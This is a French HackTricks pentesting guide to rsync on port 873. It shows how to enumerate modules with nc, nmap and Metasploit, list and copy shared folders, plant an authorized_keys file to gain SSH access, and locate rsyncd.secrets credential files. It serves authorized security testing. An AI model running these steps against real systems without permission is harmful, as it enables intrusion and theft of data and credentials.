6.8 KiB
873 - Pentesting Rsync
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert Red Team AWS de HackTricks)!
Autres façons de soutenir HackTricks:
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
- Obtenez le swag officiel PEASS & HackTricks
- Découvrez La famille PEASS, notre collection exclusive de NFT
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-nous sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud github repos.
Informations de base
D'après wikipedia:
rsync est un utilitaire pour transférer et synchroniser efficacement des fichiers entre un ordinateur et un disque dur externe et entre des ordinateurs en réseau en comparant les horodatages de modification et les tailles des fichiers.[3] On le trouve couramment sur les systèmes d'exploitation de type Unix-like. L'algorithme rsync est un type de codage delta et est utilisé pour minimiser l'utilisation du réseau. Zlib peut être utilisé pour une compression de données supplémentaire,[3] et SSH ou stunnel peuvent être utilisés pour la sécurité.
Port par défaut: 873
PORT STATE SERVICE REASON
873/tcp open rsync syn-ack
Énumération
Bannière & Communication manuelle
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0 <--- You receive this banner with the version from the server
@RSYNCD: 31.0 <--- Then you send the same info
#list <--- Then you ask the sever to list
raidroot <--- The server starts enumerating
USBCopy
NAS_Public
_NAS_Recycle_TOSRAID <--- Enumeration finished
@RSYNCD: EXIT <--- Sever closes the connection
#Now lets try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password
Énumération des dossiers partagés
Les modules Rsync sont reconnus comme des partages de répertoires qui pourraient être protégés par des mots de passe. Pour identifier les modules disponibles et vérifier s'ils nécessitent des mots de passe, les commandes suivantes sont utilisées :
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list
# Example with IPv6 and alternate port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
Soyez conscient que certaines partages pourraient ne pas apparaître dans la liste, les cachant éventuellement. De plus, l'accès à certains partages pourrait être restreint à des identifiants spécifiques, comme indiqué par un message "Accès refusé".
Brute Force
Utilisation Manuelle de Rsync
Après avoir obtenu une liste de modules, les actions dépendent de la nécessité d'authentification. Sans authentification, lister et copier des fichiers depuis un dossier partagé vers un répertoire local est réalisé en utilisant :
# Listing a shared folder
rsync -av --list-only rsync://192.168.0.123/shared_name
# Copying files from a shared folder
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
Ce processus transfère de manière récursive des fichiers, en préservant leurs attributs et permissions.
Avec des identifiants, la liste et le téléchargement depuis un dossier partagé peuvent être effectués comme suit, où une invite de mot de passe apparaîtra :
rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
Pour télécharger du contenu, tel qu'un fichier authorized_keys pour l'accès, utilisez :
rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
POST
Pour localiser le fichier de configuration rsyncd, exécutez :
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
Dans ce fichier, un paramètre secrets file pourrait pointer vers un fichier contenant des noms d'utilisateur et des mots de passe pour l'authentification rsyncd.
Références
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!
Autres façons de soutenir HackTricks:
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
- Obtenez le swag officiel PEASS & HackTricks
- Découvrez La famille PEASS, notre collection exclusive de NFTs
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez nous sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud github repos.